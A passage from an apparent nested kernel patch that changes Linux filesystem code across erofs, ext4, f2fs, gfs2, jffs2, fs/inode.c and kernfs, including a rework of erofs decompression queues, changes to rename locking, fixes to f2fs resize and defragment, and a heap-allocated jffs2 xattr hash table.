+ 				    z_erofs_next_pcluster_t qtail[],
+ 				    z_erofs_next_pcluster_t owned_head)
+@@ -1362,11 +1442,7 @@ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
+ 	z_erofs_next_pcluster_t *const submit_qtail = qtail[JQ_SUBMIT];
+ 	z_erofs_next_pcluster_t *const bypass_qtail = qtail[JQ_BYPASS];
+ 
+-	DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+-	if (owned_head == Z_EROFS_PCLUSTER_TAIL)
+-		owned_head = Z_EROFS_PCLUSTER_TAIL_CLOSED;
+-
+-	WRITE_ONCE(pcl->next, Z_EROFS_PCLUSTER_TAIL_CLOSED);
++	WRITE_ONCE(pcl->next, Z_EROFS_PCLUSTER_TAIL);
+ 
+ 	WRITE_ONCE(*submit_qtail, owned_head);
+ 	WRITE_ONCE(*bypass_qtail, &pcl->next);
+@@ -1376,8 +1452,7 @@ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
+ 
+ static void z_erofs_decompressqueue_endio(struct bio *bio)
+ {
+-	tagptr1_t t = tagptr_init(tagptr1_t, bio->bi_private);
+-	struct z_erofs_decompressqueue *q = tagptr_unfold_ptr(t);
++	struct z_erofs_decompressqueue *q = bio->bi_private;
+ 	blk_status_t err = bio->bi_status;
+ 	struct bio_vec *bvec;
+ 	struct bvec_iter_all iter_all;
+@@ -1396,7 +1471,7 @@ static void z_erofs_decompressqueue_endio(struct bio *bio)
+ 	}
+ 	if (err)
+ 		q->eio = true;
+-	z_erofs_decompress_kickoff(q, tagptr_unfold_tags(t), -1);
++	z_erofs_decompress_kickoff(q, -1);
+ 	bio_put(bio);
+ }
+ 
+@@ -1409,7 +1484,6 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 	struct address_space *mc = MNGD_MAPPING(EROFS_SB(sb));
+ 	z_erofs_next_pcluster_t qtail[NR_JOBQUEUES];
+ 	struct z_erofs_decompressqueue *q[NR_JOBQUEUES];
+-	void *bi_private;
+ 	z_erofs_next_pcluster_t owned_head = f->owned_head;
+ 	/* bio is NULL initially, so no need to initialize last_{index,bdev} */
+ 	pgoff_t last_index;
+@@ -1419,7 +1493,13 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 	unsigned long pflags;
+ 	int memstall = 0;
+ 
+-	bi_private = jobqueueset_init(sb, q, fgq, force_fg);
++	/*
++	 * if managed cache is enabled, bypass jobqueue is needed,
++	 * no need to read from device for all pclusters in this queue.
++	 */
++	q[JQ_BYPASS] = jobqueue_init(sb, fgq + JQ_BYPASS, NULL);
++	q[JQ_SUBMIT] = jobqueue_init(sb, fgq + JQ_SUBMIT, force_fg);
++
+ 	qtail[JQ_BYPASS] = &q[JQ_BYPASS]->head;
+ 	qtail[JQ_SUBMIT] = &q[JQ_SUBMIT]->head;
+ 
+@@ -1433,15 +1513,10 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 		unsigned int i = 0;
+ 		bool bypass = true;
+ 
+-		/* no possible 'owned_head' equals the following */
+-		DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 		DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_NIL);
+-
+ 		pcl = container_of(owned_head, struct z_erofs_pcluster, next);
++		owned_head = READ_ONCE(pcl->next);
+ 
+-		/* close the main owned chain at first */
+-		owned_head = cmpxchg(&pcl->next, Z_EROFS_PCLUSTER_TAIL,
+-				     Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 		if (z_erofs_is_inline_pcluster(pcl)) {
+ 			move_to_bypass_jobqueue(pcl, qtail, owned_head);
+ 			continue;
+@@ -1488,7 +1563,7 @@ submit_bio_retry:
+ 				last_bdev = mdev.m_bdev;
+ 				bio->bi_iter.bi_sector = (sector_t)cur <<
+ 					LOG_SECTORS_PER_BLOCK;
+-				bio->bi_private = bi_private;
++				bio->bi_private = q[JQ_SUBMIT];
+ 				if (f->readahead)
+ 					bio->bi_opf |= REQ_RAHEAD;
+ 				++nr_bios;
+@@ -1521,7 +1596,7 @@ submit_bio_retry:
+ 		kvfree(q[JQ_SUBMIT]);
+ 		return;
+ 	}
+-	z_erofs_decompress_kickoff(q[JQ_SUBMIT], *force_fg, nr_bios);
++	z_erofs_decompress_kickoff(q[JQ_SUBMIT], nr_bios);
+ }
+ 
+ static void z_erofs_runqueue(struct z_erofs_decompress_frontend *f,
+diff --git a/fs/erofs/zdata.h b/fs/erofs/zdata.h
+deleted file mode 100644
+index d98c952129852..0000000000000
+--- a/fs/erofs/zdata.h
++++ /dev/null
+@@ -1,178 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-only */
+-/*
+- * Copyright (C) 2018 HUAWEI, Inc.
+- *             https://www.huawei.com/
+- */
+-#ifndef __EROFS_FS_ZDATA_H
+-#define __EROFS_FS_ZDATA_H
+-
+-#include "internal.h"
+-#include "tagptr.h"
+-
+-#define Z_EROFS_PCLUSTER_MAX_PAGES	(Z_EROFS_PCLUSTER_MAX_SIZE / PAGE_SIZE)
+-#define Z_EROFS_INLINE_BVECS		2
+-
+-/*
+- * let's leave a type here in case of introducing
+- * another tagged pointer later.
+- */
+-typedef void *z_erofs_next_pcluster_t;
+-
+-struct z_erofs_bvec {
+-	struct page *page;
+-	int offset;
+-	unsigned int end;
+-};
+-
+-#define __Z_EROFS_BVSET(name, total) \
+-struct name { \
+-	/* point to the next page which contains the following bvecs */ \
+-	struct page *nextpage; \
+-	struct z_erofs_bvec bvec[total]; \
+-}
+-__Z_EROFS_BVSET(z_erofs_bvset,);
+-__Z_EROFS_BVSET(z_erofs_bvset_inline, Z_EROFS_INLINE_BVECS);
+-
+-/*
+- * Structure fields follow one of the following exclusion rules.
+- *
+- * I: Modifiable by initialization/destruction paths and read-only
+- *    for everyone else;
+- *
+- * L: Field should be protected by the pcluster lock;
+- *
+- * A: Field should be accessed / updated in atomic for parallelized code.
+- */
+-struct z_erofs_pcluster {
+-	struct erofs_workgroup obj;
+-	struct mutex lock;
+-
+-	/* A: point to next chained pcluster or TAILs */
+-	z_erofs_next_pcluster_t next;
+-
+-	/* L: the maximum decompression size of this round */
+-	unsigned int length;
+-
+-	/* L: total number of bvecs */
+-	unsigned int vcnt;
+-
+-	/* I: page offset of start position of decompression */
+-	unsigned short pageofs_out;
+-
+-	/* I: page offset of inline compressed data */
+-	unsigned short pageofs_in;
+-
+-	union {
+-		/* L: inline a certain number of bvec for bootstrap */
+-		struct z_erofs_bvset_inline bvset;
+-
+-		/* I: can be used to free the pcluster by RCU. */
+-		struct rcu_head rcu;
+-	};
+-
+-	union {
+-		/* I: physical cluster size in pages */
+-		unsigned short pclusterpages;
+-
+-		/* I: tailpacking inline compressed size */
+-		unsigned short tailpacking_size;
+-	};
+-
+-	/* I: compression algorithm format */
+-	unsigned char algorithmformat;
+-
+-	/* L: whether partial decompression or not */
+-	bool partial;
+-
+-	/* L: indicate several pageofs_outs or not */
+-	bool multibases;
+-
+-	/* A: compressed bvecs (can be cached or inplaced pages) */
+-	struct z_erofs_bvec compressed_bvecs[];
+-};
+-
+-/* let's avoid the valid 32-bit kernel addresses */
+-
+-/* the chained workgroup has't submitted io (still open) */
+-#define Z_EROFS_PCLUSTER_TAIL           ((void *)0x5F0ECAFE)
+-/* the chained workgroup has already submitted io */
+-#define Z_EROFS_PCLUSTER_TAIL_CLOSED    ((void *)0x5F0EDEAD)
+-
+-#define Z_EROFS_PCLUSTER_NIL            (NULL)
+-
+-struct z_erofs_decompressqueue {
+-	struct super_block *sb;
+-	atomic_t pending_bios;
+-	z_erofs_next_pcluster_t head;
+-
+-	union {
+-		struct completion done;
+-		struct work_struct work;
+-	} u;
+-
+-	bool eio;
+-};
+-
+-static inline bool z_erofs_is_inline_pcluster(struct z_erofs_pcluster *pcl)
+-{
+-	return !pcl->obj.index;
+-}
+-
+-static inline unsigned int z_erofs_pclusterpages(struct z_erofs_pcluster *pcl)
+-{
+-	if (z_erofs_is_inline_pcluster(pcl))
+-		return 1;
+-	return pcl->pclusterpages;
+-}
+-
+-/*
+- * bit 30: I/O error occurred on this page
+- * bit 0 - 29: remaining parts to complete this page
+- */
+-#define Z_EROFS_PAGE_EIO			(1 << 30)
+-
+-static inline void z_erofs_onlinepage_init(struct page *page)
+-{
+-	union {
+-		atomic_t o;
+-		unsigned long v;
+-	} u = { .o = ATOMIC_INIT(1) };
+-
+-	set_page_private(page, u.v);
+-	smp_wmb();
+-	SetPagePrivate(page);
+-}
+-
+-static inline void z_erofs_onlinepage_split(struct page *page)
+-{
+-	atomic_inc((atomic_t *)&page->private);
+-}
+-
+-static inline void z_erofs_page_mark_eio(struct page *page)
+-{
+-	int orig;
+-
+-	do {
+-		orig = atomic_read((atomic_t *)&page->private);
+-	} while (atomic_cmpxchg((atomic_t *)&page->private, orig,
+-				orig | Z_EROFS_PAGE_EIO) != orig);
+-}
+-
+-static inline void z_erofs_onlinepage_endio(struct page *page)
+-{
+-	unsigned int v;
+-
+-	DBG_BUGON(!PagePrivate(page));
+-	v = atomic_dec_return((atomic_t *)&page->private);
+-	if (!(v & ~Z_EROFS_PAGE_EIO)) {
+-		set_page_private(page, 0);
+-		ClearPagePrivate(page);
+-		if (!(v & Z_EROFS_PAGE_EIO))
+-			SetPageUptodate(page);
+-		unlock_page(page);
+-	}
+-}
+-
+-#define Z_EROFS_ONSTACK_PAGES		32
+-
+-#endif
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index bb91cc6499725..0337b70b2dac4 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -55,8 +55,7 @@ static int z_erofs_fill_inode_lazy(struct inode *inode)
+ 	if (test_bit(EROFS_I_Z_INITED_BIT, &vi->flags))
+ 		goto out_unlock;
+ 
+-	pos = ALIGN(iloc(EROFS_SB(sb), vi->nid) + vi->inode_isize +
+-		    vi->xattr_isize, 8);
++	pos = ALIGN(erofs_iloc(inode) + vi->inode_isize + vi->xattr_isize, 8);
+ 	kaddr = erofs_read_metabuf(&buf, sb, erofs_blknr(pos), EROFS_KMAP);
+ 	if (IS_ERR(kaddr)) {
+ 		err = PTR_ERR(kaddr);
+@@ -169,10 +168,9 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ {
+ 	struct inode *const inode = m->inode;
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	const erofs_off_t ibase = iloc(EROFS_I_SB(inode), vi->nid);
+ 	const erofs_off_t pos =
+-		Z_EROFS_VLE_LEGACY_INDEX_ALIGN(ibase + vi->inode_isize +
+-					       vi->xattr_isize) +
++		Z_EROFS_VLE_LEGACY_INDEX_ALIGN(erofs_iloc(inode) +
++				vi->inode_isize + vi->xattr_isize) +
+ 		lcn * sizeof(struct z_erofs_vle_decompressed_index);
+ 	struct z_erofs_vle_decompressed_index *di;
+ 	unsigned int advise, type;
+@@ -273,7 +271,7 @@ static int unpack_compacted_index(struct z_erofs_maprecorder *m,
+ 	u8 *in, type;
+ 	bool big_pcluster;
+ 
+-	if (1 << amortizedshift == 4)
++	if (1 << amortizedshift == 4 && lclusterbits <= 14)
+ 		vcnt = 2;
+ 	else if (1 << amortizedshift == 2 && lclusterbits == 12)
+ 		vcnt = 16;
+@@ -375,18 +373,13 @@ static int compacted_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ {
+ 	struct inode *const inode = m->inode;
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	const unsigned int lclusterbits = vi->z_logical_clusterbits;
+-	const erofs_off_t ebase = ALIGN(iloc(EROFS_I_SB(inode), vi->nid) +
+-					vi->inode_isize + vi->xattr_isize, 8) +
+-		sizeof(struct z_erofs_map_header);
++	const erofs_off_t ebase = sizeof(struct z_erofs_map_header) +
++		ALIGN(erofs_iloc(inode) + vi->inode_isize + vi->xattr_isize, 8);
+ 	const unsigned int totalidx = DIV_ROUND_UP(inode->i_size, EROFS_BLKSIZ);
+ 	unsigned int compacted_4b_initial, compacted_2b;
+ 	unsigned int amortizedshift;
+ 	erofs_off_t pos;
+ 
+-	if (lclusterbits != 12)
+-		return -EOPNOTSUPP;
+-
+ 	if (lcn >= totalidx)
+ 		return -EINVAL;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 5a3dbbabe23af..0e1aeb9cb4a7c 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3834,19 +3834,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	/*
+-	 * We need to protect against old.inode directory getting converted
+-	 * from inline directory format into a normal one.
+-	 */
+-	if (S_ISDIR(old.inode->i_mode))
+-		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
+-
+ 	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
+ 				 &old.inlined);
+-	if (IS_ERR(old.bh)) {
+-		retval = PTR_ERR(old.bh);
+-		goto unlock_moved_dir;
+-	}
++	if (IS_ERR(old.bh))
++		return PTR_ERR(old.bh);
+ 
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+@@ -4043,10 +4034,6 @@ release_bh:
+ 	brelse(old.bh);
+ 	brelse(new.bh);
+ 
+-unlock_moved_dir:
+-	if (S_ISDIR(old.inode->i_mode))
+-		inode_unlock(old.inode);
+-
+ 	return retval;
+ }
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index b160863eca141..e50d5848c1001 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1235,6 +1235,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	unsigned int last_index = cc->cluster_size - 1;
+ 	loff_t psize;
+ 	int i, err;
++	bool quota_inode = IS_NOQUOTA(inode);
+ 
+ 	/* we should bypass data pages to proceed the kworkder jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+@@ -1242,7 +1243,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 		goto out_free;
+ 	}
+ 
+-	if (IS_NOQUOTA(inode)) {
++	if (quota_inode) {
+ 		/*
+ 		 * We need to wait for node_write to avoid block allocation during
+ 		 * checkpoint. This can only happen to quota writes which can cause
+@@ -1364,7 +1365,7 @@ unlock_continue:
+ 		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ 
+ 	f2fs_put_dnode(&dn);
+-	if (IS_NOQUOTA(inode))
++	if (quota_inode)
+ 		f2fs_up_read(&sbi->node_write);
+ 	else
+ 		f2fs_unlock_op(sbi);
+@@ -1390,7 +1391,7 @@ out_put_cic:
+ out_put_dnode:
+ 	f2fs_put_dnode(&dn);
+ out_unlock_op:
+-	if (IS_NOQUOTA(inode))
++	if (quota_inode)
+ 		f2fs_up_read(&sbi->node_write);
+ 	else
+ 		f2fs_unlock_op(sbi);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 36db9aab47790..c230824ab5e6e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2759,6 +2759,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	loff_t psize = (loff_t)(page->index + 1) << PAGE_SHIFT;
+ 	unsigned offset = 0;
+ 	bool need_balance_fs = false;
++	bool quota_inode = IS_NOQUOTA(inode);
+ 	int err = 0;
+ 	struct f2fs_io_info fio = {
+ 		.sbi = sbi,
+@@ -2816,19 +2817,19 @@ write:
+ 		goto out;
+ 
+ 	/* Dentry/quota blocks are controlled by checkpoint */
+-	if (S_ISDIR(inode->i_mode) || IS_NOQUOTA(inode)) {
++	if (S_ISDIR(inode->i_mode) || quota_inode) {
+ 		/*
+ 		 * We need to wait for node_write to avoid block allocation during
+ 		 * checkpoint. This can only happen to quota writes which can cause
+ 		 * the below discard race condition.
+ 		 */
+-		if (IS_NOQUOTA(inode))
++		if (quota_inode)
+ 			f2fs_down_read(&sbi->node_write);
+ 
+ 		fio.need_lock = LOCK_DONE;
+ 		err = f2fs_do_write_data_page(&fio);
+ 
+-		if (IS_NOQUOTA(inode))
++		if (quota_inode)
+ 			f2fs_up_read(&sbi->node_write);
+ 
+ 		goto done;
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 8d7dc76e6f935..4d1e48c676fab 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3817,7 +3817,7 @@ void f2fs_stop_gc_thread(struct f2fs_sb_info *sbi);
+ block_t f2fs_start_bidx_of_node(unsigned int node_ofs, struct inode *inode);
+ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control);
+ void f2fs_build_gc_manager(struct f2fs_sb_info *sbi);
+-int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count);
++int f2fs_resize_fs(struct file *filp, __u64 block_count);
+ int __init f2fs_create_garbage_collection_cache(void);
+ void f2fs_destroy_garbage_collection_cache(void);
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index dbad2db68f1bc..7b94f047cbf79 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2588,6 +2588,11 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 
+ 	inode_lock(inode);
+ 
++	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++		err = -EINVAL;
++		goto unlock_out;
++	}
++
+ 	/* if in-place-update policy is enabled, don't waste time here */
+ 	set_inode_flag(inode, FI_OPU_WRITE);
+ 	if (f2fs_should_update_inplace(inode, NULL)) {
+@@ -2712,6 +2717,7 @@ clear_out:
+ 	clear_inode_flag(inode, FI_SKIP_WRITES);
+ out:
+ 	clear_inode_flag(inode, FI_OPU_WRITE);
++unlock_out:
+ 	inode_unlock(inode);
+ 	if (!err)
+ 		range->len = (u64)total << PAGE_SHIFT;
+@@ -3273,7 +3279,7 @@ static int f2fs_ioc_resize_fs(struct file *filp, unsigned long arg)
+ 			   sizeof(block_count)))
+ 		return -EFAULT;
+ 
+-	return f2fs_resize_fs(sbi, block_count);
++	return f2fs_resize_fs(filp, block_count);
+ }
+ 
+ static int f2fs_ioc_enable_verity(struct file *filp, unsigned long arg)
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 7e497f5b349ce..aa4d513daa8f8 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -2110,8 +2110,9 @@ static void update_fs_metadata(struct f2fs_sb_info *sbi, int secs)
+ 	}
+ }
+ 
+-int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
++int f2fs_resize_fs(struct file *filp, __u64 block_count)
+ {
++	struct f2fs_sb_info *sbi = F2FS_I_SB(file_inode(filp));
+ 	__u64 old_block_count, shrunk_blocks;
+ 	struct cp_control cpc = { CP_RESIZE, 0, 0, 0 };
+ 	unsigned int secs;
+@@ -2149,12 +2150,18 @@ int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
+ 		return -EINVAL;
+ 	}
+ 
++	err = mnt_want_write_file(filp);
++	if (err)
++		return err;
++
+ 	shrunk_blocks = old_block_count - block_count;
+ 	secs = div_u64(shrunk_blocks, BLKS_PER_SEC(sbi));
+ 
+ 	/* stop other GC */
+-	if (!f2fs_down_write_trylock(&sbi->gc_lock))
+-		return -EAGAIN;
++	if (!f2fs_down_write_trylock(&sbi->gc_lock)) {
++		err = -EAGAIN;
++		goto out_drop_write;
++	}
+ 
+ 	/* stop CP to protect MAIN_SEC in free_segment_range */
+ 	f2fs_lock_op(sbi);
+@@ -2174,10 +2181,20 @@ int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
+ out_unlock:
+ 	f2fs_unlock_op(sbi);
+ 	f2fs_up_write(&sbi->gc_lock);
++out_drop_write:
++	mnt_drop_write_file(filp);
+ 	if (err)
+ 		return err;
+ 
+-	freeze_super(sbi->sb);
++	err = freeze_super(sbi->sb);
++	if (err)
++		return err;
++
++	if (f2fs_readonly(sbi->sb)) {
++		thaw_super(sbi->sb);
++		return -EROFS;
++	}
++
+ 	f2fs_down_write(&sbi->gc_lock);
+ 	f2fs_down_write(&sbi->cp_global_sem);
+ 
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index d879a295b688e..bd020a992c2e7 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -1002,20 +1002,12 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
+-	/*
+-	 * Copied from ext4_rename: we need to protect against old.inode
+-	 * directory getting converted from inline directory format into
+-	 * a normal one.
+-	 */
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
+-
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out_unlock_old;
++		goto out;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1123,9 +1115,6 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_unlock(old_inode);
+-
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1140,9 +1129,6 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
+-out_unlock_old:
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 07419c3e42a52..a010b4bc36d2c 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -941,8 +941,10 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 	dn->ofs_in_node = 0;
+ 	f2fs_truncate_data_blocks(dn);
+ 	err = truncate_node(dn);
+-	if (err)
++	if (err) {
++		f2fs_put_page(page, 1);
+ 		return err;
++	}
+ 
+ 	return 1;
+ }
+diff --git a/fs/fs_context.c b/fs/fs_context.c
+index 24ce12f0db32e..851214d1d013d 100644
+--- a/fs/fs_context.c
++++ b/fs/fs_context.c
+@@ -561,7 +561,8 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 			return -ENOMEM;
+ 	}
+ 
+-	ctx->legacy_data[size++] = ',';
++	if (size)
++		ctx->legacy_data[size++] = ',';
+ 	len = strlen(param->key);
+ 	memcpy(ctx->legacy_data + size, param->key, len);
+ 	size += len;
+diff --git a/fs/gfs2/file.c b/fs/gfs2/file.c
+index bc6cd5f4b1077..c367f1678d5dc 100644
+--- a/fs/gfs2/file.c
++++ b/fs/gfs2/file.c
+@@ -1029,8 +1029,8 @@ static ssize_t gfs2_file_buffered_write(struct kiocb *iocb,
+ 	}
+ 
+ 	gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, gh);
+-retry:
+ 	if (should_fault_in_pages(from, iocb, &prev_count, &window_size)) {
++retry:
+ 		window_size -= fault_in_iov_iter_readable(from, window_size);
+ 		if (!window_size) {
+ 			ret = -EFAULT;
+diff --git a/fs/inode.c b/fs/inode.c
+index 8c4078889754f..6ae760db13116 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -1103,6 +1103,48 @@ void discard_new_inode(struct inode *inode)
+ }
+ EXPORT_SYMBOL(discard_new_inode);
+ 
++/**
++ * lock_two_inodes - lock two inodes (may be regular files but also dirs)
++ *
++ * Lock any non-NULL argument. The caller must make sure that if he is passing
++ * in two directories, one is not ancestor of the other.  Zero, one or two
++ * objects may be locked by this function.
++ *
++ * @inode1: first inode to lock
++ * @inode2: second inode to lock
++ * @subclass1: inode lock subclass for the first lock obtained
++ * @subclass2: inode lock subclass for the second lock obtained
++ */
++void lock_two_inodes(struct inode *inode1, struct inode *inode2,
++		     unsigned subclass1, unsigned subclass2)
++{
++	if (!inode1 || !inode2) {
++		/*
++		 * Make sure @subclass1 will be used for the acquired lock.
++		 * This is not strictly necessary (no current caller cares) but
++		 * let's keep things consistent.
++		 */
++		if (!inode1)
++			swap(inode1, inode2);
++		goto lock;
++	}
++
++	/*
++	 * If one object is directory and the other is not, we must make sure
++	 * to lock directory first as the other object may be its child.
++	 */
++	if (S_ISDIR(inode2->i_mode) == S_ISDIR(inode1->i_mode)) {
++		if (inode1 > inode2)
++			swap(inode1, inode2);
++	} else if (!S_ISDIR(inode1->i_mode))
++		swap(inode1, inode2);
++lock:
++	if (inode1)
++		inode_lock_nested(inode1, subclass1);
++	if (inode2 && inode2 != inode1)
++		inode_lock_nested(inode2, subclass2);
++}
++
+ /**
+  * lock_two_nondirectories - take two i_mutexes on non-directory objects
+  *
+diff --git a/fs/internal.h b/fs/internal.h
+index 5545c26d86ae5..46caa33373a48 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -153,6 +153,8 @@ extern long prune_icache_sb(struct super_block *sb, struct shrink_control *sc);
+ int dentry_needs_remove_privs(struct user_namespace *, struct dentry *dentry);
+ bool in_group_or_capable(struct user_namespace *mnt_userns,
+ 			 const struct inode *inode, vfsgid_t vfsgid);
++void lock_two_inodes(struct inode *inode1, struct inode *inode2,
++		     unsigned subclass1, unsigned subclass2);
+ 
+ /*
+  * fs-writeback.c
+diff --git a/fs/jffs2/build.c b/fs/jffs2/build.c
+index 837cd55fd4c5e..6ae9d6fefb861 100644
+--- a/fs/jffs2/build.c
++++ b/fs/jffs2/build.c
+@@ -211,7 +211,10 @@ static int jffs2_build_filesystem(struct jffs2_sb_info *c)
+ 		ic->scan_dents = NULL;
+ 		cond_resched();
+ 	}
+-	jffs2_build_xattr_subsystem(c);
++	ret = jffs2_build_xattr_subsystem(c);
++	if (ret)
++		goto exit;
++
+ 	c->flags &= ~JFFS2_SB_FLAG_BUILDING;
+ 
+ 	dbg_fsbuild("FS build complete\n");
+diff --git a/fs/jffs2/xattr.c b/fs/jffs2/xattr.c
+index da3e18503c658..acb4492f5970c 100644
+--- a/fs/jffs2/xattr.c
++++ b/fs/jffs2/xattr.c
+@@ -772,10 +772,10 @@ void jffs2_clear_xattr_subsystem(struct jffs2_sb_info *c)
+ }
+ 
+ #define XREF_TMPHASH_SIZE	(128)
+-void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
++int jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ {
+ 	struct jffs2_xattr_ref *ref, *_ref;
+-	struct jffs2_xattr_ref *xref_tmphash[XREF_TMPHASH_SIZE];
++	struct jffs2_xattr_ref **xref_tmphash;
+ 	struct jffs2_xattr_datum *xd, *_xd;
+ 	struct jffs2_inode_cache *ic;
+ 	struct jffs2_raw_node_ref *raw;
+@@ -784,9 +784,12 @@ void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ 
+ 	BUG_ON(!(c->flags & JFFS2_SB_FLAG_BUILDING));
+ 
++	xref_tmphash = kcalloc(XREF_TMPHASH_SIZE,
++			       sizeof(struct jffs2_xattr_ref *), GFP_KERNEL);
++	if (!xref_tmphash)
++		return -ENOMEM;
++
+ 	/* Phase.1 : Merge same xref */
+-	for (i=0; i < XREF_TMPHASH_SIZE; i++)
+-		xref_tmphash[i] = NULL;
+ 	for (ref=c->xref_temp; ref; ref=_ref) {
+ 		struct jffs2_xattr_ref *tmp;
+ 
+@@ -884,6 +887,8 @@ void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ 		     "%u of xref (%u dead, %u orphan) found.\n",
+ 		     xdatum_count, xdatum_unchecked_count, xdatum_orphan_count,
+ 		     xref_count, xref_dead_count, xref_orphan_count);
++	kfree(xref_tmphash);
++	return 0;
+ }
+ 
+ struct jffs2_xattr_datum *jffs2_setup_xattr_datum(struct jffs2_sb_info *c,
+diff --git a/fs/jffs2/xattr.h b/fs/jffs2/xattr.h
+index 720007b2fd65d..1b5030a3349db 100644
+--- a/fs/jffs2/xattr.h
++++ b/fs/jffs2/xattr.h
+@@ -71,7 +71,7 @@ static inline int is_xattr_ref_dead(struct jffs2_xattr_ref *ref)
+ #ifdef CONFIG_JFFS2_FS_XATTR
+ 
+ extern void jffs2_init_xattr_subsystem(struct jffs2_sb_info *c);
+-extern void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c);
++extern int jffs2_build_xattr_subsystem(struct jffs2_sb_info *c);
+ extern void jffs2_clear_xattr_subsystem(struct jffs2_sb_info *c);
+ 
+ extern struct jffs2_xattr_datum *jffs2_setup_xattr_datum(struct jffs2_sb_info *c,
+@@ -103,7 +103,7 @@ extern ssize_t jffs2_listxattr(struct dentry *, char *, size_t);
+ #else
+ 
+ #define jffs2_init_xattr_subsystem(c)
+-#define jffs2_build_xattr_subsystem(c)
++#define jffs2_build_xattr_subsystem(c)		(0)
+ #define jffs2_clear_xattr_subsystem(c)
+ 
+ #define jffs2_xattr_do_crccheck_inode(c, ic)
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index f33b3baad07cb..44842e6cf0a9b 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -652,7 +652,9 @@ static struct kernfs_node *__kernfs_new_node(struct kernfs_root *root,
+ 	return kn;
+ 
+  err_out3:
++	spin_lock(&kernfs_idr_lock);
+ 	idr_remove(&root->ino_idr, (u32)kernfs_ino(kn));
